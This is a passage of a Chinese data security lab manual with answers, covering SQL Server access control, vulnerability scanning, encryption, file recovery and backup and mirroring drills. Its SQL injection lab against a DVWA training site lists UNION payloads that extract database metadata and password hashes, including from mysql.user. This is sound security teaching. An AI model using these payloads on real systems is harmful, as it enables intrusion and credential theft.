數(shù)據(jù)安全實(shí)驗(yàn)手冊(cè)+答案 專題1-6 數(shù)據(jù)庫安全-數(shù)據(jù)隱私保護(hù)技術(shù)

PA目錄1206專題1數(shù)據(jù)庫安全 2242841.1【實(shí)訓(xùn)1】基于視圖的訪問控制 2217711.2【實(shí)訓(xùn)2】基于角色的訪問控制 4103821.3【實(shí)訓(xùn)3】數(shù)據(jù)庫漏洞掃描 771.4【實(shí)訓(xùn)4】數(shù)據(jù)庫SQL注入漏洞 9263731.5【實(shí)訓(xùn)5】數(shù)據(jù)庫數(shù)據(jù)的加密 1132637專題2數(shù)據(jù)容災(zāi)技術(shù) 13196292.1【實(shí)訓(xùn)6】EasyRecovery數(shù)據(jù)恢復(fù)實(shí)踐 13257362.2【實(shí)訓(xùn)7】數(shù)據(jù)誤操作恢復(fù)案例 1554132.3【實(shí)訓(xùn)8】數(shù)據(jù)庫鏡像容災(zāi)模擬故障演練 17305762.4【實(shí)訓(xùn)9】誤操作數(shù)據(jù)庫恢復(fù)方法（日志尾部備份） 207705專題3數(shù)據(jù)隱藏與數(shù)字水印 239433.1【實(shí)訓(xùn)10】HTML信息隱藏 23163023.2【實(shí)訓(xùn)11】圖片隱寫-完全脆弱圖像水印 2664293.3【實(shí)訓(xùn)12】檢測(cè)水印算法魯棒性 3010618專題4數(shù)字取證技術(shù) 3150124.1【實(shí)訓(xùn)13】易失性數(shù)據(jù)收集 31287104.2【實(shí)訓(xùn)14】瀏覽器歷史記錄數(shù)據(jù)恢復(fù)提取方法 3311544.3【實(shí)訓(xùn)15】X-waysForensics取證 3464374.4【實(shí)訓(xùn)16】volatility取證 4113895專題5數(shù)據(jù)加密技術(shù) 4474675.1【實(shí)驗(yàn)17】對(duì)稱密碼算法的實(shí)現(xiàn) 44325985.2【實(shí)驗(yàn)18】公鑰密碼算法的實(shí)現(xiàn) 46243855.3【實(shí)驗(yàn)19】數(shù)字簽名算法的實(shí)現(xiàn) 4829195.4【實(shí)驗(yàn)20】java安全機(jī)制和數(shù)字證書的管理 51178445.5【實(shí)驗(yàn)21】凱撒密碼的加密和解密 54131225.6【實(shí)驗(yàn)22】RAR文件加密和破解 56192405.7【實(shí)驗(yàn)23】MD5的計(jì)算和破解 5732752專題6數(shù)據(jù)隱私保護(hù)技術(shù) 58208896.1【實(shí)驗(yàn)24】數(shù)據(jù)匿名化入門 5872466.2【實(shí)驗(yàn)25】保護(hù)好自己的隱私 59專題1數(shù)據(jù)庫安全1.1【實(shí)訓(xùn)1】基于視圖的訪問控制 一、實(shí)訓(xùn)目的1.掌握視圖的定義與使用方法；2.了解視圖在訪問控制中的作用。注意：下面的任務(wù)采用的數(shù)據(jù)庫編程語言以SQLServer數(shù)據(jù)庫為例。二、實(shí)訓(xùn)任務(wù)任務(wù)1【隱藏查詢的復(fù)雜】創(chuàng)建一個(gè)視圖V_ItemCount，查詢銷售訂單中每個(gè)物料的訂貨數(shù)量。實(shí)訓(xùn)結(jié)果寫于下方1>CREATEVIEWV_ItemCount2>AS3>SELECTorderid,itemid,countFROMorders;4>GO1>SELECT*FROMV_ItemCount;2>GOorderiditemidcount100000110001100任務(wù)2【基于視圖的簡單查詢】查詢銷售訂單中物料編號(hào)為10001的訂貨數(shù)量。實(shí)訓(xùn)結(jié)果寫于下方1>SELECTcountFROMV_ItemCountWHEREitemid=10001;2>GOcount100任務(wù)3【查詢所有列權(quán)限】授予用戶User1查看物料表的權(quán)限。實(shí)訓(xùn)結(jié)果寫于下方1>GRANTSELECTONitemTOUser12>GO任務(wù)4【視圖的安全性控制1-可見列控制】創(chuàng)建一個(gè)視圖V_Item，查詢所有物料的信息（顯示列：物料編號(hào)、物料名稱、物料類別、創(chuàng)建日期、創(chuàng)建人），然后授予用戶User1只能查看物料表中物料名稱和物料編號(hào)的權(quán)限。實(shí)訓(xùn)結(jié)果寫于下方1>CREATEVIEWV_Item2>AS3>SELECTitemid,name,category,create_date,creatorFROMitem;4>GO1>GRANTSELECTONV_Item(name,itemid)TOUser1;2>GO任務(wù)5【視圖的安全性控制2-可見行控制】創(chuàng)建一個(gè)視圖V_Item_Mine，查詢當(dāng)前用戶創(chuàng)建的所有物料的信息（顯示列：物料編號(hào)、物料名稱、物料類別、創(chuàng)建日期、創(chuàng)建人），然后授予每個(gè)用戶查看物料表的權(quán)限，每個(gè)用戶只能看到自己創(chuàng)建的物料信息。實(shí)訓(xùn)結(jié)果寫于下方1>CREATEVIEWV_Item_Mine2>AS3>SELECTitemid,name,category,create_date,creatorFROMitem;4>GO1>GRANTSELECTONitemTOUser1;2>GO1>CREATESCHEMASecurity;2>GO1>CREATEFUNCTIONSecurity.fn_securitypredicate(@creatorASsysname)2>RETURNSTABLE3>WITHSCHEMABINDING4>AS5>RETURNSELECT1ASfn_securitypredicate_result6>WHERE@creator=USER_NAME();7>GO1>CREATESECURITYPOLICYSalesFilter2>ADDFILTERPREDICATESecurity.fn_securitypredicate(creator)3>ONdbo.item4>WITH(STATE=ON)5>GO1>GRANTSELECTONsecurity.fn_securitypredicateTOUser1;2>GO三、拓展任務(wù)任務(wù)1【可見行控制】在產(chǎn)品銷售數(shù)據(jù)庫中創(chuàng)建成本小于1000的產(chǎn)品視圖，授予用戶User1查看產(chǎn)品視圖V_CP_PRICE1000的權(quán)限。實(shí)訓(xùn)結(jié)果寫于下方1>CREATEVIEWV_CP_PRICE10002>AS3>SELECTproductid,name,cost,pricefromproductWHEREprice<1000;4>GO1>GRANTSELECTONV_CP_PRICE1000TOUser1;2>GO任務(wù)2【查詢視圖】基于V_CP_PRICE1000視圖，查詢價(jià)格在1000以下產(chǎn)品的產(chǎn)品編號(hào)、名稱和價(jià)格。實(shí)訓(xùn)結(jié)果寫于下方1>SELECTproductid,name,priceFROMV_CP_PRICE1000;2>GOproductidnameprice100081bike900任務(wù)3【加密視圖與更新視圖】利用T-SQL語句，要求加密并保證對(duì)該視圖的更新都要符合成本小于1000這個(gè)條件。對(duì)于視圖VIEW_CP_PRICE2000進(jìn)行以下數(shù)據(jù)更新。（1）插入一條產(chǎn)品記錄（'100082','數(shù)碼相機(jī)',500）。（2）將產(chǎn)品編號(hào)為’100082’的成本改為1500。（3）刪除產(chǎn)品編號(hào)為’100082’的產(chǎn)品。實(shí)訓(xùn)結(jié)果寫于下方1>CREATEVIEWVIEW_CP_PRICE20002>WITHENCRYPTION3>AS4>SELECTproductid,name,cost,priceFROMproductWHEREcost<10005>WITHCHECKOPTION;6>GO1>INSERTVIEW_CP_PRICE2000(productid,name,cost)VALUES('100082','Digitalcamera',500);2>GO(1rowsaffected)1>UPDATEVIEW_CP_PRICE20002>SETcost=15003>WHEREproductid=100082;4>GOMsg550,Level16,State1,Server7f1dce33814c,Line1TheattemptedinsertorupdatefailedbecausethetargetvieweitherspecifiesWITHCHECKOPTIONorspansaviewthatspecifiesWITHCHECKOPTIONandoneormorerowsresultingfromtheoperationdidnotqualifyundertheCHECKOPTIONconstraint.Thestatementhasbeenterminated.1>DELETEFROMVIEW_CP_PRICE2000WHEREproductid=100082;2>GO(1rowsaffected)

1.2【實(shí)訓(xùn)2】基于角色的訪問控制一、實(shí)訓(xùn)目的1、掌握SQLServer身份驗(yàn)證模式；2、掌握創(chuàng)建登錄賬戶、數(shù)據(jù)庫用戶的方法；3、掌握使用角色實(shí)現(xiàn)數(shù)據(jù)庫安全性的方法；4、掌握權(quán)限的分配；5、學(xué)會(huì)運(yùn)用T-SQL語句進(jìn)行權(quán)限管理；6、理解SQLSever的安全機(jī)制。注意：下面的任務(wù)采用的數(shù)據(jù)庫編程語言以SQLServer數(shù)據(jù)庫為例?？梢暬念}目用截圖方式、T-SQL語句用復(fù)制粘貼方式寫于對(duì)應(yīng)的位置。二、實(shí)訓(xùn)任務(wù)任務(wù)1【創(chuàng)建登錄名、服務(wù)器角色】用T-SQL創(chuàng)建登錄名sql-user用T-SQL創(chuàng)建服務(wù)器角色server實(shí)訓(xùn)結(jié)果寫于下方創(chuàng)建登錄名sql-usercreateloginsql_userwithpassword='sql_user_pass1';go創(chuàng)建服務(wù)器角色serverusemastercreateserverroleservergo任務(wù)2【創(chuàng)建數(shù)據(jù)庫用戶及角色】創(chuàng)建銷售數(shù)據(jù)庫用戶myuser（登錄名為sql_user）添加用戶myuser到固定數(shù)據(jù)庫角色db_owner中創(chuàng)建自定義數(shù)據(jù)庫角色myrole實(shí)訓(xùn)結(jié)果寫于下方創(chuàng)建銷售數(shù)據(jù)庫用戶myuser（登錄名為sql_user）createdatabasebusinessgousebusinessgocreateusermyuserforloginsql_usergo添加用戶myuser到固定數(shù)據(jù)庫角色db_owner中execsp_addrolemember'db_owner','myuser'go創(chuàng)建自定義數(shù)據(jù)庫角色myrolecreaterolemyrolego任務(wù)3【權(quán)限管理】1、以sa登錄，創(chuàng)建一個(gè)數(shù)據(jù)庫，數(shù)據(jù)庫名為DB1，在該數(shù)據(jù)庫中創(chuàng)建一個(gè)學(xué)生表（學(xué)號(hào)，姓名，性別，年齡，所在系）。實(shí)訓(xùn)結(jié)果寫于下方createdatabaseDB1gouseDB1gocreatetablestudents( sidintprimarykeynotnull,snamevarchar(16),ssexvarchar(8),sageint,smajorvarchar(16))go2、以sa登錄，創(chuàng)建一個(gè)登錄(Login)，登錄名為Login1，密碼為login_pass1。以Login1登錄，觀察可訪問的數(shù)據(jù)庫情況，并記錄。實(shí)訓(xùn)結(jié)果寫于下方以SA登錄createloginLogin1withpassword='login_pass1'go退出SA并以Login1登錄useDB1go3、以sa登錄，在DB1數(shù)據(jù)庫中創(chuàng)建數(shù)據(jù)庫用戶weng，使用戶weng能用登錄名Login1登錄，并成為DB1的數(shù)據(jù)庫用戶，再次以Login1登錄，觀察可訪問的數(shù)據(jù)庫情況，并記錄。請(qǐng)?jiān)诓樵兎治銎髦袌?zhí)行如下SQL，觀察并記錄結(jié)果。（1）select*fromstudents（2）用SQL在學(xué)生表中插入一條記錄（3）createtablecourses( cidchar(10)primarykey, cnamechar(30)notnull, cscoresmallintnotnull)實(shí)訓(xùn)結(jié)果寫于下方以SA身份登錄useDB1gocreateuserwengforloginLogin1go退出SA，以Login1身份登錄useDB1goselect*fromstudentsgoinsertstudents(sid,sname,ssex,sage,smajor)values(1,student1,girl,computer)gocreatetablecourses(cidchar(10)primarykey,cnamechar(30)notnull,cscoresmallintnotnull)go由于與Login1映射的數(shù)據(jù)庫用戶weng沒有相關(guān)的權(quán)限，上述的SQL都會(huì)被拒絕執(zhí)行4、以sa登錄，用授權(quán)語句賦于weng用戶創(chuàng)建表的權(quán)力，查詢學(xué)生表的權(quán)力，向?qū)W生表中添加、修改、刪除記錄的權(quán)力。實(shí)訓(xùn)結(jié)果寫于下方以SA身份登錄useDB1gograntselect,insert,updateonstudentstowenggrantalteronschema::dbotowenggrantcreatetabletowenggo5、重新執(zhí)行3中的SQL，觀察并記錄結(jié)果。實(shí)訓(xùn)結(jié)果寫于下方上述SQL可以正常執(zhí)行6、以sa登錄，用收權(quán)語句收回weng用戶創(chuàng)建表的權(quán)力，查詢學(xué)生表的權(quán)力，向?qū)W生表中添加、修改、刪除記錄的權(quán)力。實(shí)訓(xùn)結(jié)果寫于下方以SA身份登錄useDB1gorevokeselect,insert,updateonstudentstowengrevokecreatetabletowenggo7、重新執(zhí)行3中的SQL，觀察并記錄結(jié)果。實(shí)訓(xùn)結(jié)果寫于下方由于沒有權(quán)限，SQL被拒絕執(zhí)行三、拓展任務(wù)任務(wù)1【登陸授權(quán)與訪問控制】創(chuàng)建二個(gè)登錄，登錄名分別為user1、user2，密碼分別為user_pass1、user_pass2，并使他們都能訪問DB1數(shù)據(jù)庫。用SQL語句將學(xué)生表的所有權(quán)利賦予user1用戶，將課程表的所有權(quán)利賦予user2用戶。實(shí)訓(xùn)結(jié)果寫于下方以SA身份登錄createloginuser1withpassword="user_pass1"createloginuser2withpassword="user_pass2"gouseDB1gocreateuseruser1forloginuser1createuseruser2forloginuser2gograntallonstudentstouser1grantalloncoursestouser2go任務(wù)2【登陸授權(quán)與訪問控制】創(chuàng)建四個(gè)登錄，登錄名分別為user3、user4、user5、user6，密碼分別為user_pass3、user_pass4、user_pass5、user_pass6，并使他們都能訪問DB1數(shù)據(jù)庫。用SQL語句將學(xué)生表的所有權(quán)利賦予user3用戶，并能將權(quán)利再授權(quán)給其它用戶，再用SQL語句將學(xué)生表的所有權(quán)利賦予user4用戶，但不能授權(quán)給其它用戶。以u(píng)ser3身份登錄，進(jìn)入DB1數(shù)據(jù)庫，并將學(xué)生表的所有權(quán)利賦予user5；以u(píng)ser4身份登錄，進(jìn)入DB1數(shù)據(jù)庫，并將學(xué)生表的權(quán)利賦予user6，觀察對(duì)比二者的不同。實(shí)訓(xùn)結(jié)果寫于下方以SA身份登錄createloginuser3withpassword="user_pass3"createloginuser4withpassword="user_pass4"createloginuser5withpassword="user_pass5"createloginuser6withpassword="user_pass6"gocreateuseruser3forloginuser3createuseruser4forloginuser4createuseruser5forloginuser5createuseruser6forloginuser6gograntallonstudentstouser3withgrantoptiongrantallonstudentstouser4gograntall會(huì)引起SQLServer的警告，因?yàn)閿?shù)據(jù)庫系統(tǒng)認(rèn)為這樣的操作是不安全的，此處可以忽略。以u(píng)ser3身份登錄useDB1gograntallonstudentstouser5go成功授權(quán)退出user3，以u(píng)ser4身份登錄useDB1gograntallonstudentstouser6go由于user4沒有給其他用戶授權(quán)的權(quán)限，所以授權(quán)失敗。1.3【實(shí)訓(xùn)3】數(shù)據(jù)庫漏洞掃描 一、實(shí)訓(xùn)目的1、了解常見的可能出現(xiàn)漏洞的協(xié)議層；2、了解協(xié)議層中常見的漏洞；3、學(xué)會(huì)漏洞掃描常用的工具語言及協(xié)議層對(duì)應(yīng)的描述方式；4、了解常見掃描報(bào)告的必需元素。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Windows操作系統(tǒng)，SQLServer數(shù)據(jù)庫，X-Scan軟件任務(wù)1【sa賬戶設(shè)置】打開SQLServer的管理界面，采用windows身份驗(yàn)證連接到服務(wù)器，修改sa用戶的權(quán)限為啟用狀態(tài)并將其密碼修改為abc123。重新用sa賬戶進(jìn)行登錄到服務(wù)器。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)2【X-Scan掃描參數(shù)設(shè)置并掃描】打開X-Scan軟件并設(shè)置掃描參數(shù)對(duì)遠(yuǎn)程主機(jī)的數(shù)據(jù)庫進(jìn)行漏洞掃描。其中的IP地址為數(shù)據(jù)庫服務(wù)器主機(jī)的IP地址，其他選項(xiàng)為默認(rèn)設(shè)置即可。查看掃描結(jié)果，可以發(fā)現(xiàn)數(shù)據(jù)庫服務(wù)器主機(jī)存在弱口令的安全漏洞問題。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)3【修改密碼復(fù)雜度后掃描】再次修改sa用戶的密碼，此時(shí)密碼設(shè)置應(yīng)該盡可能的復(fù)雜，然后再運(yùn)行X-Scan掃描軟件進(jìn)行目標(biāo)主機(jī)的數(shù)據(jù)庫漏洞掃描。觀察掃描結(jié)果，并記錄結(jié)果。實(shí)訓(xùn)結(jié)果寫于下方三、拓展任務(wù)任務(wù)【掃描報(bào)告與安全性分析】嘗試不同類型的數(shù)據(jù)庫主機(jī)進(jìn)行掃描，并通過查看掃描報(bào)告進(jìn)行分析不同的數(shù)據(jù)庫系統(tǒng)的安全性。實(shí)訓(xùn)結(jié)果寫于下方

1.4【實(shí)訓(xùn)4】數(shù)據(jù)庫SQL注入漏洞 一、實(shí)訓(xùn)目的1.了解SQL注入漏洞的類型。2.了解視圖在訪問控制中的作用。注意：下面的任務(wù)采用的數(shù)據(jù)庫編程語言以SQLServer數(shù)據(jù)庫為例。二、實(shí)訓(xùn)任務(wù)實(shí)訓(xùn)描述：在dvwa環(huán)境安全級(jí)別為low的前提下，進(jìn)行SQL注入攻擊，利用之前章節(jié)中提到的注入技巧進(jìn)行注入攻擊，獲取更多有關(guān)于數(shù)據(jù)庫的信息?！緦?shí)訓(xùn)環(huán)境說明】搭建dvwa環(huán)境、MySQL數(shù)據(jù)庫任務(wù)1【獲取dvwa環(huán)境】搭建dvwa環(huán)境，包括1、搭建phpstudy服務(wù)；2、部署dvwa服務(wù)；3、訪問dvwa主頁。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)2【判斷存在的SQL注入漏洞類型】判斷安全級(jí)別為medium的前提下，所存在的SQL注入漏洞類型。（提示：可以嘗試使用“1'or1=1#”與“1or1=1#”來判斷所存在的SQL注入漏洞類型。）實(shí)訓(xùn)結(jié)果寫于下方任務(wù)3【獲取數(shù)據(jù)庫名稱、賬戶名、版本及操作系統(tǒng)信息】獲取數(shù)據(jù)庫名稱、賬戶名、版本及操作系統(tǒng)信息提示：利用UNION查詢結(jié)合MySQL的內(nèi)置函數(shù)user()，database()，version()，獲取數(shù)據(jù)庫信息。例如使用下列注入語句獲取數(shù)據(jù)庫名稱、賬戶名：1'unionselectuser(),database()#

實(shí)訓(xùn)結(jié)果寫于下方任務(wù)4【獲取數(shù)據(jù)庫表名、列名】利用MySQL的視圖：INFORMATION_SCHEMA.TABLES和INFORMATION_SCHEMA.CONLUMNS例如使用下列注入語句獲取數(shù)據(jù)庫表名：1'unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()#實(shí)訓(xùn)結(jié)果寫于下方任務(wù)5【獲取用戶名密碼，并猜測(cè)root用戶】獲取數(shù)據(jù)庫的用戶名密碼，利用聯(lián)合查詢注入：1'or1=1unionselectgroup_concat(user_id,first_name,last_name),group_concat(password)fromusers#實(shí)訓(xùn)結(jié)果寫于下方任務(wù)6【猜測(cè)root用戶】利用mysql.user，猜測(cè)root用戶：獲取數(shù)據(jù)庫的用戶名密碼，利用聯(lián)合查詢注入：1'unionselect1,group_concat(user,password)frommysql.user#實(shí)訓(xùn)結(jié)果寫于下方三、拓展任務(wù)任務(wù)【思考】根據(jù)上述實(shí)訓(xùn)過程，請(qǐng)思考并分析，如果能夠防止SQL注入攻擊？目前常用的預(yù)防方式有哪些？實(shí)訓(xùn)結(jié)果寫于下方1.5【實(shí)訓(xùn)5】數(shù)據(jù)庫數(shù)據(jù)的加密一、實(shí)訓(xùn)目的1.了解使用證書加密數(shù)據(jù)的方法。2.了解使用證書解密數(shù)據(jù)的方法。注意：下面的任務(wù)采用的數(shù)據(jù)庫編程語言以SQLServer數(shù)據(jù)庫為例。二、實(shí)訓(xùn)任務(wù)任務(wù)1【使用證書加密數(shù)據(jù)】創(chuàng)建數(shù)據(jù)庫TestDB1、建測(cè)試表tb(id,data),id字段為自增長列，data字段為要加密的列，數(shù)據(jù)類型要為varbinary，因?yàn)榧用芎蟮臄?shù)據(jù)是二進(jìn)制數(shù)據(jù)。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)2【創(chuàng)建并使用主密鑰】創(chuàng)建主密鑰，CREATEMASTERKEYENCRYPTIONBYPASSWORD='abc123'；使用數(shù)據(jù)庫主密鑰：OPENMASTERKEYDECRYPTIONBYPASSWORD='abc123'。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)3【用密碼創(chuàng)建證書】用密碼abc123創(chuàng)建證書Cert1。START_DATE為當(dāng)前系統(tǒng)日期，有效期為一年。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)4【向測(cè)試表中寫入一條測(cè)試數(shù)據(jù)】向測(cè)試表中寫入一條測(cè)試數(shù)據(jù)。提示：利用EncryptByCert()方法寫入證書內(nèi)容。然后查看測(cè)試表中的數(shù)據(jù)。實(shí)訓(xùn)結(jié)果寫于下方任務(wù)5【提取加密后數(shù)據(jù)】提取加密后數(shù)據(jù)。提示：利用cast()進(jìn)行數(shù)據(jù)轉(zhuǎn)換，利用DecryptByCert()方法進(jìn)行解密。實(shí)訓(xùn)結(jié)果寫于下方

專題2數(shù)據(jù)容災(zāi)技術(shù)2.1【實(shí)訓(xùn)6】EasyRecovery數(shù)據(jù)恢復(fù)實(shí)踐一、實(shí)訓(xùn)目的1.了解電磁泄漏現(xiàn)象引起的數(shù)據(jù)恢復(fù)；2.掌握硬件損壞、文件的刪除等實(shí)現(xiàn)數(shù)據(jù)恢復(fù)。二、實(shí)訓(xùn)任務(wù)案例描述：某員工使用電腦過程中，不小心刪除了一些有用的文件，并且又清空了回收站，該員工亟需辦法恢復(fù)被刪除的文件。計(jì)算機(jī)磁盤屬于磁介質(zhì)，所有磁介質(zhì)都存在剩磁效應(yīng)的問題，保存在磁介質(zhì)中的信息會(huì)使磁介質(zhì)不同程度地永久性磁化，所以磁介質(zhì)上記載的信息在一定程度上是抹除不凈的，通過一定的技術(shù)手段可以將已抹除信息的磁盤上的原有信息提取出來。另外，由于計(jì)算機(jī)文件系統(tǒng)的實(shí)現(xiàn)原理，文件的刪除并沒有將文件的數(shù)據(jù)內(nèi)容從磁盤上刪除，通過一定的技術(shù)手段可以將刪除的文件恢復(fù)出來。通過該實(shí)訓(xùn)，使學(xué)生認(rèn)識(shí)到電磁泄漏現(xiàn)象引起的數(shù)據(jù)恢復(fù)，硬件損壞、文件的刪除等實(shí)現(xiàn)數(shù)據(jù)恢復(fù)的內(nèi)容。理解磁盤數(shù)據(jù)恢復(fù)的原理，認(rèn)識(shí)數(shù)據(jù)恢復(fù)技術(shù)對(duì)信息安全的影響。能夠使用數(shù)據(jù)恢復(fù)軟件EasyRecovery進(jìn)行文件恢復(fù)。提高要求：能夠?qū)Υ疟P數(shù)據(jù)進(jìn)行徹底清除。任務(wù)1【知識(shí)積累】請(qǐng)分別對(duì)誤操作類、病毒破壞類、軟件破壞類、硬件故障類進(jìn)行舉例。結(jié)果寫于下方任務(wù)2【徹底刪除文件的方法】請(qǐng)羅列幾種可以徹底刪除文件的方法。結(jié)果寫于下方任務(wù)3【數(shù)據(jù)恢復(fù)軟件EasyRecovery】EasyRecovery是世界著名數(shù)據(jù)恢復(fù)公司Ontrack的技術(shù)杰作。其Professioanl版更是囊括了磁盤診斷、數(shù)據(jù)恢復(fù)、文件修復(fù)、E-mail修復(fù)等全部4大類目19個(gè)項(xiàng)目的各種數(shù)據(jù)文件修復(fù)和磁盤診斷方案。本次使用的就是EasyRecoveryProfessioanl，版本為13.0。 EasyRecovery在修復(fù)過程中不對(duì)原數(shù)據(jù)進(jìn)行改動(dòng)，只是以讀的形式處理要修復(fù)的分區(qū)。它不會(huì)將任何數(shù)據(jù)寫入它正在處理的分區(qū)。EasyRecovery還包括了一個(gè)實(shí)用程序用來創(chuàng)建緊急啟動(dòng)軟盤，以便在你不能啟動(dòng)進(jìn)入Windows的時(shí)候在DOS下修復(fù)數(shù)據(jù)。EasyRecovery修復(fù)范圍：修復(fù)主引導(dǎo)扇區(qū)（MBR）、修復(fù)BIOS參數(shù)塊（BPB）、修復(fù)分區(qū)表、修復(fù)文件分配表（FAT）或主文件表（MFT）、修復(fù)根目錄。具體步驟如下步驟1：1）安裝并運(yùn)行數(shù)據(jù)恢復(fù)軟件EasyRecovery軟件。2）創(chuàng)建文件“我的文件.txt”，內(nèi)容為：“密碼：abc123”，并將其拷貝到U盤，然后刪除該文件。3）啟動(dòng)EasyRecovery數(shù)據(jù)恢復(fù)軟件。4）點(diǎn)擊“DataRecovery”，并點(diǎn)擊“DeletedRecovery”。5）在出現(xiàn)的對(duì)話框中選擇U盤的分區(qū)（即選擇要掃描的卷），并在“FileFilter”編輯框中輸入“*.txt”，點(diǎn)擊“Next”。提示，被誤刪除的文件如何恢復(fù)注意事項(xiàng)：注意事項(xiàng)一：用戶可點(diǎn)擊上圖窗口左側(cè)的“NTFS已刪除”選項(xiàng)查看所有已刪除文件，從而尋找目標(biāo)文件；注意事項(xiàng)二：用戶可在窗口右上角輸入框輸入目標(biāo)文件格式，點(diǎn)擊“搜索”按鈕縮小搜尋范圍。輸入“doc”點(diǎn)“搜索”按鈕之后，文件列表便只展示doc文件了；注意事項(xiàng)三：用戶可點(diǎn)擊“修改日期”按鈕，文件將依照刪除日期有序顯示。6）搜索完畢，已刪除文件將以列表形式展現(xiàn)。在出現(xiàn)的對(duì)話框中選擇將要恢復(fù)的文件“我的文件.txt”，并點(diǎn)擊“Next”，選擇恢復(fù)文件保存的文件夾，例如：“我的文檔”。提示：不能將已刪除文件保存到所掃描的磁盤中7）一路Next，完成文件恢復(fù)。8）打開“我的文檔”，發(fā)現(xiàn)存在文件“密件.txt”，打開后確認(rèn)文件內(nèi)容。三、拓展任務(wù)任務(wù)【拓展思考】為什么刪除的磁盤文件能夠恢復(fù)回來？怎樣才能徹底的刪除文件？

2.2【實(shí)訓(xùn)7】數(shù)據(jù)誤操作恢復(fù)案例一、實(shí)訓(xùn)目的1.了解避免數(shù)據(jù)誤刪除的備份策略；2.掌握對(duì)故障的分析方法以及安全方案的設(shè)計(jì)。二、實(shí)訓(xùn)任務(wù)案例描述：某一公司的DBA，在寫SQL刪除語句的時(shí)候，由于Where條件書寫有誤，導(dǎo)致系統(tǒng)中一張重要表的約幾萬條記錄被誤刪除。第二天才發(fā)現(xiàn)自己犯了這個(gè)大錯(cuò)誤，但是在進(jìn)行上述誤操作之后，系統(tǒng)做過數(shù)據(jù)庫完整備份，也就是說，昨天的備份已經(jīng)被新的完整備份取代，即已經(jīng)沒有誤操作之前全庫備份。任務(wù)1【事前諸葛】為了避免上述情況，應(yīng)采用什么樣的備份策略？提示：可以從什么時(shí)間用完整備份、什么時(shí)間用差異備份、什么時(shí)間用日志備份等方面進(jìn)行討論。結(jié)果寫于下方任務(wù)2【事后諸葛】應(yīng)如何來恢復(fù)這些被刪除的記錄？提示：這種記錄誤刪除的恢復(fù)，如果有歷史的完整備份，可以新建一個(gè)數(shù)據(jù)庫，將原來備份的數(shù)據(jù)庫恢復(fù)回來，再將記錄插入到被誤刪除的表中，如果沒有之前的完整備份，則只能通過日志來恢復(fù)。結(jié)果寫于下方任務(wù)3【制定解決方案】根據(jù)對(duì)故障的分析和對(duì)任務(wù)的資料的查詢，制定出問題初步的解決方案。提示：分別從備份策略的制定原則、設(shè)計(jì)、示例進(jìn)行說明。（1）制定備份原則結(jié)果寫于下方提示：原則一：數(shù)據(jù)庫備份能保障在數(shù)據(jù)丟失的情況下，能恢復(fù)重要數(shù)據(jù)。因此，在數(shù)據(jù)庫中的數(shù)據(jù)發(fā)生變化后，要及時(shí)對(duì)重要的數(shù)據(jù)進(jìn)行備份。原則二：數(shù)據(jù)備份不能影響業(yè)務(wù)處理的正常進(jìn)行，將完全備份這類占用服務(wù)資源高的備份設(shè)置在業(yè)務(wù)處理的空閑時(shí)間段，而將日志備份在業(yè)務(wù)處理的高峰。原則三：對(duì)于重要的數(shù)據(jù)，要將數(shù)據(jù)庫備份到多種介質(zhì)和多個(gè)地方，這樣一處備份損壞了，還有其他的備份可用。你制定原則：（2）備份策略設(shè)計(jì)。提示：備份策略包括：完全數(shù)據(jù)庫備份策略、完全數(shù)據(jù)庫和事務(wù)日志備份策略、差異備份策略、數(shù)據(jù)庫文件或文件組備份策略等。根據(jù)情況進(jìn)行設(shè)計(jì)。結(jié)果寫于下方（3）備份策略示例示例如下星期日：凌晨2:00執(zhí)行數(shù)據(jù)庫完整備份，星期一、二、三、四、五、六凌晨2:00執(zhí)行數(shù)據(jù)庫差異備份，其余時(shí)間則每隔半小時(shí)做日志備份截?cái)嗍聞?wù)日志。每個(gè)星期的每一天都單獨(dú)保留相應(yīng)的備份。三、拓展任務(wù)任務(wù)【還原誤刪除并恢復(fù)數(shù)據(jù)】按下圖所示，請(qǐng)按照步驟完成相應(yīng)的內(nèi)容，實(shí)現(xiàn)誤刪除的還原，并利用備份和還原技術(shù)恢復(fù)數(shù)據(jù)。圖2-19還原誤刪除并恢復(fù)數(shù)據(jù)7步驟2.3【實(shí)訓(xùn)8】數(shù)據(jù)庫鏡像容災(zāi)模擬故障演練一、實(shí)訓(xùn)目的1.了解數(shù)據(jù)庫鏡像容災(zāi)的配置；2.掌握對(duì)故障的分析方法以及安全方案的設(shè)計(jì)。二、實(shí)訓(xùn)任務(wù)案例1【鏡像容災(zāi)方法1】案例1描述：數(shù)據(jù)庫服務(wù)器，HIS的A群集作為主服務(wù)器，數(shù)據(jù)流通過鏡像傳向B機(jī)（單臺(tái)服務(wù)器），HIS服務(wù)器無法連接上，經(jīng)檢查發(fā)現(xiàn)HIS服務(wù)器的數(shù)據(jù)庫連接數(shù)異常增加，死鎖頻繁，有幾個(gè)任務(wù)同時(shí)開啟導(dǎo)致并發(fā)數(shù)大量被占用，關(guān)閉任務(wù)需要很長的回滾時(shí)間，因此決定切換到鏡像服務(wù)器B機(jī)上。步驟1：點(diǎn)擊數(shù)據(jù)庫鏡像屬性里的“故障轉(zhuǎn)移按鈕”，此時(shí)數(shù)據(jù)庫會(huì)丟棄當(dāng)前未提交的事務(wù)，轉(zhuǎn)移到鏡像服務(wù)器上去。步驟2：原來的鏡像庫處于“正在還原”狀態(tài)，故障轉(zhuǎn)移之后，將處于正常訪問狀態(tài)。步驟3：將B機(jī)的IP地址改為A群集的群集IP地址即可。（IP地址的切換可以利用windowscluster進(jìn)行自動(dòng)切換效果更佳，鏡像就直接做在一個(gè)群集內(nèi)部的兩臺(tái)機(jī)器上。）步驟4：整個(gè)切換過程耗時(shí)6分鐘左右。在合適的時(shí)候，通過事務(wù)日志和增量備份還原的方法，再把在B機(jī)上產(chǎn)生的事務(wù)和數(shù)據(jù)導(dǎo)入到A群集中去。

